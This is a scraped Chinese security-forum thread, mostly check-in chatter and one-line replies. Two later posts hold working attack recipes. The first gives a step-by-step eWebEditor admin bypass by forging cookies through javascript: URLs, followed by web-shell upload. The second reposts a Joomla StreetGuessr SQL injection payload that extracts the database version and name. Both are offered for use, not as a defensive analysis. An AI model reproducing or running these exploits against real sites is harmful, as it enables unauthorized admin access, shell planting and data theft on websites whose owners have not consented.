最近看过此主题的会员

返回列表 发帖

12.15管理组签到

提示: 作者被禁止或删除 内容自动屏蔽
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:vini5发表,本帖发表者vini5符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者vini5和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

我抢。。。
1

评分人数

TOP

沙发
1

评分人数

TOP

鄙视啊、。。。。。。。。。。

TOP

我只知道老大木JJ啊,
老大是淫贼。
1

评分人数

TOP

我系统没了IE

咋办呀,安装也安不上了
1

评分人数

TOP

{:3_57:}抢啦··
1

评分人数

TOP

签到
1

评分人数

TOP

签到

TOP

居然没注意到

TOP

我了个去  没注意呢

TOP

才来····  继续。。。
攻防无绝对 技术无黑白

TOP

ewebeditor 3.8漏洞[php]
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



php版ewebeditor 3.8的漏洞


php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法: 1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车, 2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了 3 后面的利用和asp一样,新增样式修改上传,就ok了 测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的) aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了</TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Joomla! Component StreetGuessr Game v1.1.8 SQL注入漏洞
# # # # #
# Exploit Title: Joomla! Component StreetGuessr Game v1.1.8 - SQL Injection
# Dork: N/A
# Date: 03.08.2017
# Vendor : https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
# Demo: https://www.streetguessr.com/en/component/streetguess/
# Version: 1.1.8
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_streetguess&amp;view=maps&amp;catid=[SQL]
# 0'+/*!11110procedure*/+/*!11110analyse*/+(/*!11110extractvalue*/(0x30,/*!11110concat*/(0x27,/*!11110@@version*/,0x7e,/*!11110database()*/)),0x30)--+-

# Etc..
# # # # #


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

手把手教你装Linux系统-Linux安装方式

http://www.sitedir.com.cn/video/2.swf


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表